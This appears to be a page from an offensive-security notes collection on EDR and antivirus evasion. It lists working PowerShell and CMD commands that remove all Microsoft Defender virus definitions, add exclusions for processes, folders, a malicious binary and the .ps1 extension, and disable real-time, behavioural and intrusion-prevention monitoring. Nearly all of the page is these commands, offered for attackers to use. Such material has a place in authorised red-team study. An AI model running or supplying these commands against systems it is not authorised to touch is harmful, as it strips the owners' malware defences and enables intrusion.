EDR / AV Evasion

Evading security solutions can be tricky and difficult task to achieve. Windows Defender is typically one of the more easily bypassable security solutions, unless Defender MDE/MDI are deployed via InTune or alternative methods.

Some simple ways to disarm Defender include:

Removing all virus definitions of Microsoft Defender (Administrator required)

# Run in CMD or powershell
PS:> cmd /c "%PROGRAMFILES%\Windows Defender\MPCMDRUN.exe" -RemoveDefinitions -All
PS:> C:\Program Files\Windows Defender\MPCMDRUN.EXE -RemoveDefinitions -All

Adding a process, folder, file or extension to the exclusion list (Administrator required)

# Exclude a process
PS:> Set-MpPreference -ExclusionProcess untrusted.exe

# Exclude a folder
PS:> Set-MpPreference -ExclusionPath C:\Excluded\Path

# Exclude a file
PS:> Set-MpPreference -ExclusionPath C:\location\of\evil\binary\evil.exe

# Exclude an extension
PS:> Set-MpPreference -ExclusionExtension .ps1

Disabling Microsoft Defender's real-time protection (Administrator required)

# Disable real-time protection, behavioural monitoring and intrusion prevention
PS:> Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableBehaviorMonitoring $true

PreviousActive Directory NextDLL Sideloading

Last updated 1 year ago